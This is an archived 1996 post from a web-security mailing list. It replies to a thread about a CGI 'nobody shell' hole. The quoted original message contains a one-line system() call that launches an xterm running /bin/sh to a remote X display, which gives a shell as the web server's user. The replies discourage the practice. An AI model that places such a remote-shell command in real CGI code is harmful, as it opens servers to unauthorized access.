[3692] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Byron Chun)
Wed Dec 4 15:01:27 1996
Date: Wed, 4 Dec 1996 09:31:47 -0800
To: www-security@ns2.rutgers.edu
From: Byron Chun <byron@wellsfargo.com>
Errors-To: owner-www-security@ns2.rutgers.edu
I don't think putting system(), fork(), or other such calls is a good idea,
even if it simplifies the task since you are risking a system compromise.
Byron Chun
Beware of Trojan Horses.
At 02:15 AM 12/4/96 -0500, Brian Harvell wrote:
>>
>> I was experimenting with cgi scripts when I came up with this idea:
>>
>> What if I have a cgi script which does the followin:
>> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>>
>> I can now pop an exterm on my display as nobody.
>> This way any user can gain access to the nobody account and
>> have fun with it...
>>
>> Has this been discussed anywhere?
>> Is there a fix out there?
>>
>Yeah don't do it. You can do things a lot worse if you wanted.
>
>Brian
>
>
>Brian Harvell harvell@iNet.net http://www.iNet.net/~harvell
>echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc
>
>
>
===================================
Byron Chun
byron@wellsfargo.com
"Calm down. It's only 1's and 0's."
